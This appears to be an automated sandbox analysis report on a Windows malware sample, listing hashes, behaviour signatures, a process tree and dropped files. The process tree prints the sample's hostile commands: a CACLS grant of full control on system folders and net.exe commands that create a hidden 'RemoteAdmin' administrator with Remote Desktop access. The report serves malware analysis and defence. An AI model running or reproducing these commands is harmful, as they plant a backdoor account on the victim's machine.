Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    25/08/2024, 10:10

General

  • Target

    c0822b0d14b651b6e1c018c8c0bca9d2_JaffaCakes118.exe

  • Size

    854KB

  • MD5

    c0822b0d14b651b6e1c018c8c0bca9d2

  • SHA1

    424d410d3daa2f3b5cfe5cc369f7eee654c042ba

  • SHA256

    a4a71e8143d4c321322829a9e0b84eff48327bdc39fc3f0a8c56263f153d17d3

  • SHA512

    d4a45f060923c15641bd0588a4799659511dffb8998943514a7388d340267824bbc9f8bd93a30ef139364a1048d65c773c5f2a3aabad23519130363827b1337f

  • SSDEEP

    12288:AraepSMZpe26zfs25lRL0Ktu9w4xW7tI4m7kbchfide0sHTkz21ITCqE38AExV:aZwr26jNLeeClWQAU6eKz2COqaF0

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

    Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

  • Indicator Removal: Network Share Connection Removal 1 TTPs 2 IoCs

    Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 37 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops desktop.ini file(s) 2 IoCs
  • Modifies WinLogon 2 TTPs 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c0822b0d14b651b6e1c018c8c0bca9d2_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\c0822b0d14b651b6e1c018c8c0bca9d2_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2712
    • C:\Users\Admin\AppData\Local\Temp\tzuP.exe
      tzuP.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2820
      • C:\Users\Admin\AppData\Local\Temp\Compress0\desktop.exe
        "C:\Users\Admin\AppData\Local\Temp\Compress0\desktop.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        • Drops desktop.ini file(s)
        • Drops file in System32 directory
        • Drops file in Program Files directory
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3032
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c echo y| CACLS C:\Windows\spool /G Everyone:f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:572
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo y"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1336
          • C:\Windows\SysWOW64\cacls.exe
            CACLS C:\Windows\spool /G Everyone:f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2140
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c echo y| CACLS C:\PROGRA~1\ACCESS~1\Common /G Everyone:f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2932
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo y"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:764
          • C:\Windows\SysWOW64\cacls.exe
            CACLS C:\PROGRA~1\ACCESS~1\Common /G Everyone:f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2092
        • C:\Windows\spool\cmss.exe
          C:\Windows\spool\cmss.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • Modifies WinLogon
          • Hide Artifacts: Hidden Users
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          PID:2144
          • C:\Windows\spool\lsass.exe
            C:\Windows\spool\lsass.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            PID:2248
          • C:\Windows\msn.exe
            C:\Windows\msn.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            PID:2120
          • C:\Windows\spool\lsass.exe
            C:\Windows\spool\lsass.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            PID:2100
          • C:\Windows\SysWOW64\net.exe
            net user RemoteAdmin ecotopia /add
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2300
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 user RemoteAdmin ecotopia /add
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1800
          • C:\Windows\SysWOW64\net.exe
            net localgroup Administrators /Add RemoteAdmin
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2032
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 localgroup Administrators /Add RemoteAdmin
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1432
          • C:\Windows\SysWOW64\net.exe
            net localgroup users /Delete RemoteAdmin
            5⤵
            • Indicator Removal: Network Share Connection Removal
            • System Location Discovery: System Language Discovery
            PID:964
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 localgroup users /Delete RemoteAdmin
              6⤵
              • Indicator Removal: Network Share Connection Removal
              • System Location Discovery: System Language Discovery
              PID:384
          • C:\Windows\SysWOW64\net.exe
            net localgroup "Remote Desktop Users" /Add RemoteAdmin
            5⤵
            • Remote Service Session Hijacking: RDP Hijacking
            • System Location Discovery: System Language Discovery
            PID:1896
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 localgroup "Remote Desktop Users" /Add RemoteAdmin
              6⤵
              • Remote Service Session Hijacking: RDP Hijacking
              • System Location Discovery: System Language Discovery
              PID:556
        • C:\Windows\msn.exe
          C:\Windows\msn.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of SetWindowsHookEx
          PID:1352
          • C:\Windows\spool\lsass.exe
            C:\Windows\spool\lsass.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            PID:2252
          • C:\Windows\spool\cmss.exe
            C:\Windows\spool\cmss.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            PID:2072
        • C:\Windows\spool\lsass.exe
          C:\Windows\spool\lsass.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:2236

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Accessories\Common\clog.txt

          Filesize

          198B

          MD5

          fceb994bd3c60029331a22a53c19871b

          SHA1

          e9bd26049ba5b4bfdea8c8e0051ad37250d870c0

          SHA256

          37ccab91655a12090dcecbcbc77f6457e2e15d50a04bcd46b90243cc356062f4

          SHA512

          34769839b935372be642d19f029f87d5e7f9e5effbdd447d488840c07dc9e86d58cc3dd6bfd3f46af737a902f6cf33b39c048c68299314a42fd03dcbee0c4fc6

        • C:\Users\Admin\AppData\Local\Temp\Compress0\MSWINSCK.OCX

          Filesize

          106KB

          MD5

          3d8fd62d17a44221e07d5c535950449b

          SHA1

          6c9d2ecdd7c2d1b9660d342e2b95a82229486d27

          SHA256

          eba048e3a9cb11671d0e3c5a0b243b304d421762361fe24fd5ea08cb66704b09

          SHA512

          501e22a0f99e18f6405356184506bc5849adc2c1df3bdee71f2b4514ab0e3e36673b4aecbd615d24ebb4be5a28570b2a6f80bd52331edb658f7a5f5a9d686d10

        • C:\Users\Admin\AppData\Local\Temp\Compress0\dunin.dll

          Filesize

          2B

          MD5

          9bf31c7ff062936a96d3c8bd1f8f2ff3

          SHA1

          f1abd670358e036c31296e66b3b66c382ac00812

          SHA256

          e629fa6598d732768f7c726b4b621285f9c3b85303900aa912017db7617d8bdb

          SHA512

          9a6398cffc55ade35b39f1e41cf46c7c491744961853ff9571d09abb55a78976f72c34cd7a8787674efa1c226eaa2494dbd0a133169c9e4e2369a7d2d02de31a

        • C:\Users\Admin\AppData\Local\Temp\Compress0\ftpa.dll

          Filesize

          5B

          MD5

          32af4302da238b64605ef49f872aad21

          SHA1

          f97aaba396dbbbc143acd751cdf72150fe85f798

          SHA256

          d66928953a2c09d957b49ec0498550349b2f82a0f1d73931aeb39c9bff1e0dc3

          SHA512

          22637137df12b596714a211dfbff022ca42142b4104068b4326511f84fe091e30ae66060be715a5be9fe59313c24e64ae99655a78ef00df8287091dc24484f27

        • C:\Users\Admin\AppData\Local\Temp\Compress0\ftps.dll

          Filesize

          9B

          MD5

          17cc45731514eb956c6ec43ca4dd2a71

          SHA1

          487eaf8d52177e51dbefee855c4d9682f39c7ae1

          SHA256

          116a593de27f51a4372ab3fff36b69f44f5394771fa6a8edd7a5dbd201bf3a2d

          SHA512

          9f4645a4902f2b607dea3c9c2fa4a0784d275e432c3279096d3295fcfa4a4d157ee09040f2e44f7ffa16db18d9f6e09f34ecda4d0a74301d390252de2abf1fd7

        • C:\Users\Admin\AppData\Local\Temp\Compress0\ftsv.dll

          Filesize

          17B

          MD5

          b2bf8db5e80efb9d58528b6264fdf086

          SHA1

          550df9d3b6f15afc80832ff2551f60938c1b4a63

          SHA256

          ccf1724ba72944874962927afe1b7a216adbaba3dca1b38730cdeacb133088ed

          SHA512

          a496dd4a93a85bf5de100ec5d17afaed496d4e2526ba6a3f1d09da593d4b8aad85834924561877a90c9762e919bb3b87d7236389e8439c6fd21b838521c86f2a

        • C:\Users\Admin\AppData\Local\Temp\Compress0\ftus.dll

          Filesize

          13B

          MD5

          df7afd56b057ac5894d080b5044b2dbd

          SHA1

          de45d927ec0cae7991cb24e0f0cd3012e1357fcd

          SHA256

          30f2daeec172c264f54892c9ef28f1f72a980f55167aa3ce39894b5602924ec7

          SHA512

          3a9d2c62b04a2dd73ee6b0de49f547ea5be61541d30222a26b2550d2909dad340067ebbf97d1eb04d56f974af9bde409b66fbf7399d2b7448e67b52f8b15e814

        • C:\Users\Admin\AppData\Local\Temp\Compress0\hpreg.dll

          Filesize

          176KB

          MD5

          a0ce0247d48fecaac607edb1e2d87fd8

          SHA1

          346bf586bdf6ae4181c685fa74adf4524328d469

          SHA256

          5a0b1c4e5d91fd67a1ad23e5ce869899b79a7282cb6e5533dc5c074eb59306ec

          SHA512

          38a03530dfafe3030ece87dad7af28baff8e79f87618f1510bcb5b7f994632745dc70f9062ba6bdbcd408062786bbb3c37a53c21423d1f172663d9e57c232986

        • C:\Users\Admin\AppData\Local\Temp\Compress0\inmsg.dll

          Filesize

          40B

          MD5

          62158ca606dfd1b74f03b03f43e597c4

          SHA1

          f91a0aaaa72c124282fd28dbd9326072f789f19f

          SHA256

          4f45cc3a4c63bbd0e99ede09409dd656575c3bf68da68f1af11c01f1a3015d00

          SHA512

          389095d037013a09cb02d6d1fcc65d7f37ab86c82aa63600fba375376b0d3cc317b7bd984abcd325154c132823216d1134a303ab90cd96f8e5b7b836d68315f4

        • C:\Users\Admin\AppData\Local\Temp\Compress0\inter.dll

          Filesize

          1B

          MD5

          c4ca4238a0b923820dcc509a6f75849b

          SHA1

          356a192b7913b04c54574d18c28d46e6395428ab

          SHA256

          6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

          SHA512

          4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

        • C:\Users\Admin\AppData\Local\Temp\Compress0\mail.dll

          Filesize

          16B

          MD5

          850ef2569cad0612b4e2180f45428a80

          SHA1

          4f1133590e98a1be80bcc5604d9a982c52f627cf

          SHA256

          85fda0b7ca19d9f836076c421de754503f7c1867ab56e58691901ce2d7f7f1e6

          SHA512

          1638a4f01ac56cc660acc123f68eb4161fbff770e26cdf378371f35d51f6eafb1eda963dcb7ec15b00f9b3c013e458fa9fe18f42fa3b490af5e8480e92126bd4

        • C:\Users\Admin\AppData\Local\Temp\Compress0\msn.exe

          Filesize

          108KB

          MD5

          01faeac794a0bea918b8bf9e1af674e6

          SHA1

          73aa0e774ea044950fc72c6a169f64d137df54a2

          SHA256

          bd1b7a67ddf481227ed7ebf17b7b6512f9926a5e69f16e17575d18fa9312a417

          SHA512

          a0a4e0d5da4e06582aefbbf33ebeed88a3ede6efc2987ab75fadb45d4eebef45a957d63820de55a4191897bbef7fe8ad50db8f6f91b8ceb30b037d2ff2613de0

        • C:\Users\Admin\AppData\Local\Temp\Compress0\oem.dll

          Filesize

          1B

          MD5

          cfcd208495d565ef66e7dff9f98764da

          SHA1

          b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

          SHA256

          5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

          SHA512

          31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

        • C:\Users\Admin\AppData\Local\Temp\Compress0\port.dll

          Filesize

          3B

          MD5

          13f3cf8c531952d72e5847c4183e6910

          SHA1

          ac3e7b007d7ab0ba379faa8ab62d9da35c5444f4

          SHA256

          6d05621ab7cb7b4fb796ca2ffbe1a141e0d4319d3deb6a05322b9de85d69b923

          SHA512

          c2b37e4037631aaa4809e9a0dc82ad5ce7a04fa98a6b6de280d16181dc88de0b3e337a96a7aac19619ac65d68537dbe171b3857a72344a1a9d74bd3923460854

        • C:\Users\Admin\AppData\Local\Temp\Compress0\pwhost.dll

          Filesize

          4B

          MD5

          334c4a4c42fdb79d7ebc3e73b517e6f8

          SHA1

          71f8e7976e4cbc4561c9d62fb283e7f788202acb

          SHA256

          140bedbf9c3f6d56a9846d2ba7088798683f4da0c248231336e6a05679e4fdfe

          SHA512

          ab93a9e95d70edb06025511cea4e2b8047fb7e1deaf7244fc0d3edf5e7cb57d8fb7b951bdeb3c6b552714878749eb19b9103e64a83635e8885c7d3e1d0fc5649

        • C:\Users\Admin\AppData\Local\Temp\Compress0\refsdm.dll

          Filesize

          26B

          MD5

          30de44c2337b14e283e1f5de808e7721

          SHA1

          9364673c62a2f270fc400c746c75843f0ed919ab

          SHA256

          3def9d36316debb39167d384f0810bc64ec0ba870019a6f844b5b22dfd0c288a

          SHA512

          13b3b29cfb25ab77ed4542b1a78c475206eb758da3f209a2ed43db19561d4abeac35146f8880aebf0877f4dc3d6603c64457c0e3d8494cbdacc9bd45c8d68f96

        • C:\Users\Admin\AppData\Local\Temp\Compress0\resu.dll

          Filesize

          6B

          MD5

          79018b9d50483943a7891102073558e1

          SHA1

          e227bd10a8cb3fcc9ef3cc62be8b0785abfc4ad5

          SHA256

          bf511643f9ac25c6d6ec61e0af29cb561a0e6cdcd8afef273ab9fd2523f69cd5

          SHA512

          ddedf00256733686bdcc74a9670db5aaa85a10c4addd99ea540fd08bc5b1f01803c609047f5d3e57adf0684afdd44a89311686b3089ab00db98efa54248856e2

        • C:\Users\Admin\AppData\Local\Temp\Compress0\rvhost.dll

          Filesize

          5B

          MD5

          34c4c50fc7bdd0394f3954f73f2be34d

          SHA1

          9f537f977fa2ecd1f91ff057ce1667e98ab04729

          SHA256

          c226b0485361a7d12f677de5fd6d094fce775723bed9f5cb44000056b45636fc

          SHA512

          eda815d970711a13f2ae66ccee2e4752689e0f2c8e08d9162533e5eaadc08bd201e3e545f4c8806216eb3f775656f1c3ab9a8210bbecb29a5541e5c8284f9e21

        • C:\Users\Admin\AppData\Local\Temp\Compress0\rvport.dll

          Filesize

          7B

          MD5

          7a1920d61156abc05a60135aefe8bc67

          SHA1

          808d7dca8a74d84af27a2d6602c3d786de45fe1e

          SHA256

          21b111cbfe6e8fca2d181c43f53ad548b22e38aca955b9824706a504b0a07a2d

          SHA512

          94abfc7b11f4311e8e279b580907fefc1118690479fb7e13f0c22ade816bc2b63346498833b0241eec2b09e15172e13027dc85024bacb7bc40c150f4131f7292

        • C:\Users\Admin\AppData\Local\Temp\Compress0\rwci.dll

          Filesize

          5B

          MD5

          3f74a886c7f841699690962c497d4f30

          SHA1

          271593a69439c052d4de63e50c569060dcd78e91

          SHA256

          d4c999ae43633bd2036188d2bca68e1be8202b2cc1f3a1c42a728eaff7d2483d

          SHA512

          72d7eb167391c298ee40fbf1ae613958e9c27fdca27f3256620e9c70ba37a6dabcf43c7fa1538609c555e0f686a48f04842b6ac308f306f9da51f4ca3a6ef1e8

        • C:\Users\Admin\AppData\Local\Temp\Compress0\rwcs.dll

          Filesize

          3B

          MD5

          045117b0e0a11a242b9765e79cbf113f

          SHA1

          ec7f1f65067126f3b2bd1037de8a18d0db2ec84b

          SHA256

          7b69759630f869f2723875f873935fed29d2d12b10ef763c1c33b8e0004cb405

          SHA512

          1f748a9c15bdf0a5e3be241ac0b8ef75e4c0c339e9550c9f8fa342778c620ac88de6edd42b61398e72bea045b27649ef7992ae5ed0e0b162cd9f1aa71686a222

        • C:\Users\Admin\AppData\Local\Temp\Compress0\scint.dll

          Filesize

          2B

          MD5

          d3d9446802a44259755d38e6d163e820

          SHA1

          b1d5781111d84f7b3fe45a0852e59758cd7a87e5

          SHA256

          4a44dc15364204a80fe80e9039455cc1608281820fe2b24f1e5233ade6af1dd5

          SHA512

          3c11e4f316c956a27655902dc1a19b925b8887d59eff791eea63edc8a05454ec594d5eb0f40ae151df87acd6e101761ecc5bb0d3b829bf3a85f5432493b22f37

        • C:\Users\Admin\AppData\Local\Temp\Compress0\scloc.dll

          Filesize

          36B

          MD5

          0af629b1df207fd25f221a50059140a5

          SHA1

          1bdf9311af713c98ef038fcf89ee678884e8fb3d

          SHA256

          5d795ca75d4e40986ae410a8063f6a23a3cb1e6b2456bea570e5247ced6d9177

          SHA512

          7531d36dac630adc84e88cd75cddc3e92e23b89ddbc4994780693772a106878879a9b0a458f96262ad2df01dc5ef0c641a9c1a21dfe75b4e43a14ad37a2244b7

        • C:\Users\Admin\AppData\Local\Temp\Compress0\services.exe

          Filesize

          168KB

          MD5

          dff48c59b7a55eea69f81b2642d852ca

          SHA1

          c9ce26516a5cf95c3f54297aa2dc9dc91e69f7c1

          SHA256

          a3809af3f27da2c16f2b77f2d87faf4399375eca2ff7130c9c4891dc79c8ce55

          SHA512

          3b24d159eb652b42942250dec0881016fe99a0c61c5cb26c925828568cb1a4557bd93d91e8efd3d68c1badb178325057221bfd2eccd5caa682ff6c76b703223b

        • C:\Users\Admin\AppData\Local\Temp\Compress0\ssap.dll

          Filesize

          9B

          MD5

          e3a7a7ade9b32f5de04970e3111289f2

          SHA1

          db6023ca7df49c86894d30a6789e8ddea24afba8

          SHA256

          9a5b2200baf3be5073eca02a71d0157138190ff5ab097aca02951120651ae321

          SHA512

          e746c5cabf138422fb3c699bd5275b419c106eae189a532c4e2f553e6a763b46519a26828f28a4b31d7511dde5cf5266e1f4d12e1a5eebb30bdd3a3f637b93a3

        • C:\Users\Admin\AppData\Local\Temp\Compress0\type.dll

          Filesize

          7B

          MD5

          c3eef34d092ed60c3b2791814511903a

          SHA1

          815f979888d7a7d3cb622eee67d445c0fc94469b

          SHA256

          6bd1454e4848ba9ec48363db5afdc51f2a67b2e87bf7478b681cda2df245779a

          SHA512

          519b141185f3b4dcaf0990844aa125a23caa552d347fa69972ecf565b08b82d6b0fad321ebc0bbacca06b36fa603f4d8bd080a5a9b760e4405199b57082190ec

        • C:\Users\Admin\AppData\Local\Temp\Compress0\unir.exe

          Filesize

          36KB

          MD5

          776ef97f5d72fb916946016f11054ef1

          SHA1

          b92105a2b50f402f1684b6bb4d61d60d94d39a3d

          SHA256

          b6441da69e2709be96db9261e016229b3c18fd9d444126a89152b2002eb61530

          SHA512

          9750200e8d0a048408b0f9c2bac6fddd97ae8a312de955d43b9e49db6a7e378f7809014a72e19ace8cd2141af079e44d3e3de12781d7deb9e680fa9d3d5be30f

        • C:\Users\Admin\AppData\Local\Temp\Compress0\user.dll

          Filesize

          3B

          MD5

          276b6c4692e78d4799c12ada515bc3e4

          SHA1

          72019bbac0b3dac88beac9ddfef0ca808919104f

          SHA256

          24d4b96f58da6d4a8512313bbd02a28ebf0ca95dec6e4c86ef78ce7f01e788ac

          SHA512

          40c41475561375aa28d4d035445525f0e8f6bfaba1fdb4bc0c30dec2de112d7c7df168bdced38b4d87326b4c3f226c2ba1a09f4384451b0bc5f9c108c1c1df32

        • C:\Users\Admin\AppData\Local\Temp\Compress0\winsyst32.exe

          Filesize

          232KB

          MD5

          e502320ee741245f42d3c28982c93897

          SHA1

          b25015e41af91a19cc6bbdcca227f657f9b29540

          SHA256

          c394b72246f8e1bf35014a03756a97deaba87fbb07fe25e45c88412a36d05d68

          SHA512

          65650e57de8f7a425e93b63b16eca4ed3011b6054274d2ea97f974a6479c62c68e65d3fc26e3596fa9cff44090dbd764204f34d0b86e7bed020716905d5ac9b6

        • C:\Users\Admin\AppData\Local\Temp\Compress0\ziplog.txt

          Filesize

          5KB

          MD5

          c16945c3b38f0eea5981cbc04ef94b30

          SHA1

          d667fdcb9205b71a23daf59f65e0afe7a4f37860

          SHA256

          32e0bfc325f10c1012f4ee92d415517aa7d199cb35ebedfd006b05baad7682b5

          SHA512

          686c24439e76a227b60b91e54f7b77aa55f96c41d6d02822847612d3667e93a780c481e346c2348df00e5370d0b7f329e71639422706e4008c51b1e8f7b43bec

        • \Users\Admin\AppData\Local\Temp\Compress0\desktop.exe

          Filesize

          56KB

          MD5

          76f8154e4981426d4928cdf4a673fa74

          SHA1

          261af6de802a67017392841546d9b89b9a6127ed

          SHA256

          ebc4cb98eb90b7a6e9c143b57b411eab4abb1c854e4673136c0d51bcba2fa930

          SHA512

          bd350912a87e41ed8e0fdc2bc9b8be73883f6307975667423f4cde32db69ed74ba1639ed9e92cb658a6f784947b562f0e05a974204e4183e68fdea88767533b4

        • \Users\Admin\AppData\Local\Temp\tzuP.exe

          Filesize

          375KB

          MD5

          fb7a859807257aa10ebe35ebd0942911

          SHA1

          499e645041348edca4c1d3c63709325f369dee27

          SHA256

          f337c1107ba8a9df8dc1a347e53791cf389ab16c7b409edb0278ec624d594b1b

          SHA512

          ca33119ef0a9cb34841ec227c4fd259e9c843ec37f7f2d40ef3d42a93059eb09a24396eb1f1b3732c9a4e5afdc69211f4d9e96d446482c4da647ca100718ea4b

        • memory/2144-188-0x0000000060000000-0x000000006002E000-memory.dmp

          Filesize

          184KB

        • memory/2712-1-0x0000000000220000-0x0000000000221000-memory.dmp

          Filesize

          4KB

        • memory/2712-153-0x0000000042050000-0x000000004212C000-memory.dmp

          Filesize

          880KB